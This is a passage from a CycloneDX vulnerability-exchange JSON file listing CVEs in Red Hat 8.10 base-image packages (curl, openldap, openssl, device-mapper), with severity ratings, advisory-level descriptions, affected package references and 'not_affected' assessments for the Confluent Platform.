          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1965",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        305
      ],
      "description": "libcurl can in some circumstances reuse the wrong connection when asked to do\nan Negotiate-authenticated HTTP or HTTPS request.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criterion must first be met. Due to a\nlogical error in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different credentials. One underlying reason being that\nNegotiate sometimes authenticates *connections* and not *requests*, contrary\nto how HTTP is designed to work.\n\nAn application that allows Negotiate authentication to a server (that responds\nwanting Negotiate) with `user1:password1` and then does another operation to\nthe same server also using Negotiate but with `user2:password2` (while the\nprevious connection is still alive) - the second request wrongly reused the\nsame connection and since it then sees that the Negotiate negotiation is\nalready made, it just sends the request over that connection thinking it uses\nthe user2 credentials when it is in fact still using the connection\nauthenticated for user1...\n\nThe set of authentication methods to use is set with  `CURLOPT_HTTPAUTH`.\n\nApplications can disable libcurl's reuse of connections and thus mitigate this\nproblem, by using one of the following libcurl options to alter how\nconnections are or are not reused: `CURLOPT_FRESH_CONNECT`,\n`CURLOPT_MAXCONNECTS` and `CURLMOPT_MAX_HOST_CONNECTIONS` (if using the\ncurl_multi API).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1965"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1965"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-1965.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-1965.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-1965.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1965"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1965"
        }
      ],
      "published": "2026-03-11T11:15:59+00:00",
      "updated": "2026-06-17T10:16:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-22185",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125,
        191
      ],
      "description": "OpenLDAP Lightning Memory-Mapped Database (LMDB) versions up to and including 0.9.14, prior to commit 8e1fda8, contain a heap buffer underflow in the readline() function of mdb_load. When processing malformed input containing an embedded NUL byte, an unsigned offset calculation can underflow and cause an out-of-bounds read of one byte before the allocated heap buffer. This can cause mdb_load to crash, leading to a limited denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22185"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22185"
        },
        {
          "url": "https://bugs.openldap.org/show_bug.cgi?id=10421"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22185"
        },
        {
          "url": "https://seclists.org/fulldisclosure/2026/Jan/5"
        },
        {
          "url": "https://seclists.org/fulldisclosure/2026/Jan/8"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22185"
        },
        {
          "url": "https://www.openldap.org/"
        },
        {
          "url": "https://www.vulncheck.com/advisories/openldap-lmdb-mdb-load-heap-buffer-underflow-in-readline"
        }
      ],
      "published": "2026-01-07T21:16:01+00:00",
      "updated": "2026-06-17T10:19:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.4.46-21.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-22795",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        754
      ],
      "description": "Issue summary: An invalid or NULL pointer dereference can happen in\nan application processing a malformed PKCS#12 file.\n\nImpact summary: An application processing a malformed PKCS#12 file can be\ncaused to dereference an invalid or NULL pointer on memory read, resulting\nin a Denial of Service.\n\nA type confusion vulnerability exists in PKCS#12 parsing code where\nan ASN1_TYPE union member is accessed without first validating the type,\ncausing an invalid pointer read.\n\nThe location is constrained to a 1-byte address space, meaning any\nattempted pointer manipulation can only target addresses between 0x00 and 0xFF.\nThis range corresponds to the zero page, which is unmapped on most modern\noperating systems and will reliably result in a crash, leading only to a\nDenial of Service. Exploiting this issue also requires a user or application\nto process a maliciously crafted PKCS#12 file. It is uncommon to accept\nuntrusted PKCS#12 files in applications as they are usually used to store\nprivate keys which are trusted by definition. For these reasons, the issue\nwas assessed as Low severity.\n\nThe FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the PKCS12 implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.\n\nOpenSSL 1.0.2 is not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22795"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22795"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-3vqq-45qg-2xf6"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2502e7b7d4c0cf4f972a881641fe09edc67aeec4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/572844beca95068394c916626a6d3a490f831a49"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7bbca05be55b129651d9df4bdb92becc45002c12"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/eeee3cbd4d682095ed431052f00403004596373e"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ef2fb66ec571564d64d1c74a12e388a2a54d05d2"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-22795.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22795"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
